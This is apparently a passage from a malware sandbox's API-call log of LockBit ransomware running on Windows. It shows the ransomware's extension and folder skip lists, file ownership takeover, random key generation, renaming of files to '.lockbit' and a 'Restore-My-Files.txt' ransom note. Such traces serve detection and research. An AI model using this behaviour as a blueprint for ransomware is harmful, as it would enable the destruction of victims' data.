lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.262] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.262] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Dot.png") returned 1 [0080.262] lstrcmpiW (lpString1="ntldr", lpString2="Dot.png") returned 1 [0080.262] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Dot.png") returned 1 [0080.262] lstrcmpiW (lpString1="bootsect.bak", lpString2="Dot.png") returned -1 [0080.262] lstrcmpiW (lpString1="autorun.inf", lpString2="Dot.png") returned -1 [0080.262] lstrcmpiW (lpString1="thumbs.db", lpString2="Dot.png") returned 1 [0080.262] lstrcmpiW (lpString1="iconcache.db", lpString2="Dot.png") returned 1 [0080.262] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.262] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned=".png" [0080.262] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.262] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.262] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.262] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.263] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.263] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.263] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.lockbit") returned 60 [0080.263] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.264] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.264] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.264] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.265] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.265] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.265] RtlFreeAnsiString (AnsiString="\\") [0080.265] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0080.265] malloc (_Size=0x200) returned 0x77d800 [0080.265] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.265] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.265] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.265] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.266] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.266] CloseHandle (hObject=0x3ac) returned 1 [0080.266] free (_Block=0x77d800) [0080.266] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.266] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.266] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.266] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=23711) returned 1 [0080.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.267] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.284] malloc (_Size=0x8e) returned 0x1ff1e60 [0080.284] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0x8e, FileInformationClass=0xa) returned 0x0 [0080.285] free (_Block=0x1ff1e60) [0080.285] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.285] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.285] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.286] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee799c4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee799c4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4cb30a29, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x422c, dwReserved0=0x520150, dwReserved1=0x0, cFileName="DvdTransform.fx", cAlternateFileName="")) returned 1 [0080.286] lstrcmpiW (lpString1=".", lpString2="DvdTransform.fx") returned -1 [0080.286] lstrcmpiW (lpString1="..", lpString2="DvdTransform.fx") returned -1 [0080.286] PathFindExtensionW (pszPath="DvdTransform.fx") returned=".fx" [0080.286] lstrcmpiW (lpString1=".386", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".cmd", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".exe", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".ani", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".adv", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".theme", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".msi", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".msp", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".com", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".diagpkg", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".nls", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".diagcab", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".lock", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".ocx", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".mpa", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".cpl", lpString2=".fx") returned -1 [0080.286] lstrcmpiW (lpString1=".mod", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".hta", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".icns", lpString2=".fx") returned 1 [0080.286] lstrcmpiW (lpString1=".prf", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".rtp", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".diagcfg", lpString2=".fx") returned -1 [0080.287] lstrcmpiW (lpString1=".msstyles", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".bin", lpString2=".fx") returned -1 [0080.287] lstrcmpiW (lpString1=".hlp", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".shs", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".drv", lpString2=".fx") returned -1 [0080.287] lstrcmpiW (lpString1=".wpx", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".bat", lpString2=".fx") returned -1 [0080.287] lstrcmpiW (lpString1=".rom", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".msc", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".spl", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".ps1", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".msu", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".ics", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".key", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".mp3", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".reg", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".dll", lpString2=".fx") returned -1 [0080.287] lstrcmpiW (lpString1=".ini", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".idx", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".sys", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".hlp", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".ico", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".lnk", lpString2=".fx") returned 1 [0080.287] lstrcmpiW (lpString1=".rdp", lpString2=".fx") returned 1 [0080.288] lstrcmpiW (lpString1=".lockbit", lpString2=".fx") returned 1 [0080.288] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DvdTransform.fx") returned 1 [0080.288] lstrcmpiW (lpString1="ntldr", lpString2="DvdTransform.fx") returned 1 [0080.288] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DvdTransform.fx") returned 1 [0080.288] lstrcmpiW (lpString1="bootsect.bak", lpString2="DvdTransform.fx") returned -1 [0080.288] lstrcmpiW (lpString1="autorun.inf", lpString2="DvdTransform.fx") returned -1 [0080.288] lstrcmpiW (lpString1="thumbs.db", lpString2="DvdTransform.fx") returned 1 [0080.288] lstrcmpiW (lpString1="iconcache.db", lpString2="DvdTransform.fx") returned 1 [0080.288] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.288] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned=".fx" [0080.288] lstrcmpiW (lpString1=".rar", lpString2=".fx") returned 1 [0080.288] lstrcmpiW (lpString1=".zip", lpString2=".fx") returned 1 [0080.288] lstrcmpiW (lpString1=".7z", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".ckp", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".dacpac", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".db", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".db-shm", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".db-wal", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".db3", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".dbf", lpString2=".fx") returned -1 [0080.288] lstrcmpiW (lpString1=".dbc", lpString2=".fx") returned -1 [0080.289] lstrcmpiW (lpString1=".dbs", lpString2=".fx") returned -1 [0080.289] lstrcmpiW (lpString1=".dbt", lpString2=".fx") returned -1 [0080.289] lstrcmpiW (lpString1=".dbv", lpString2=".fx") returned -1 [0080.289] lstrcmpiW (lpString1=".frm", lpString2=".fx") returned -1 [0080.289] lstrcmpiW (lpString1=".mdf", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".mrg", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".mwb", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".myd", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".ndf", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".qry", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sdb", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sdf", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sql", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sqlite", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sqlite3", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".sqlitedb", lpString2=".fx") returned 1 [0080.289] lstrcmpiW (lpString1=".tmd", lpString2=".fx") returned 1 [0080.289] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.lockbit") returned 68 [0080.289] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.290] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.290] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.291] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.291] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.291] RtlFreeAnsiString (AnsiString="\\") [0080.291] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0080.291] malloc (_Size=0x200) returned 0x77d800 [0080.291] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.291] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.291] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.291] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.292] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.292] CloseHandle (hObject=0x3b4) returned 1 [0080.292] free (_Block=0x77d800) [0080.292] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0080.292] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.293] malloc (_Size=0x40068) returned 0x3d70048 [0080.293] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=16940) returned 1 [0080.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0080.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.294] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0080.294] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.299] malloc (_Size=0x9e) returned 0x1ff1e60 [0080.299] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0x9e, FileInformationClass=0xa) returned 0x0 [0080.304] free (_Block=0x1ff1e60) [0080.304] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.304] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.304] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.304] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="FlipPage", cAlternateFileName="")) returned 1 [0080.304] lstrcmpiW (lpString1=".", lpString2="FlipPage") returned -1 [0080.305] lstrcmpiW (lpString1="..", lpString2="FlipPage") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="$windows.~bt") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="intel") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="msocache") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="$recycle.bin") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="$windows.~ws") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="tor browser") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="boot") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="system volume information") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="perflogs") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="google") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="application data") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="windows") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="windows.old") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="appdata") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="Windows nt") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="Msbuild") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="Microsoft") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="All users") returned 1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="mozilla") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="Microsoft.NET") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="microsoft shared") returned -1 [0080.305] lstrcmpiW (lpString1="FlipPage", lpString2="Internet Explorer") returned -1 [0080.306] lstrcmpiW (lpString1="FlipPage", lpString2="common files") returned 1 [0080.306] lstrcmpiW (lpString1="FlipPage", lpString2="opera") returned -1 [0080.306] lstrcmpiW (lpString1="FlipPage", lpString2="Windows Journal") returned -1 [0080.306] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 53 [0080.306] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*") returned 55 [0080.306] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0080.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.308] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.308] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.309] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe188e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe188e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0080.309] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0080.309] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0080.309] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0080.309] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.309] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.309] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.309] 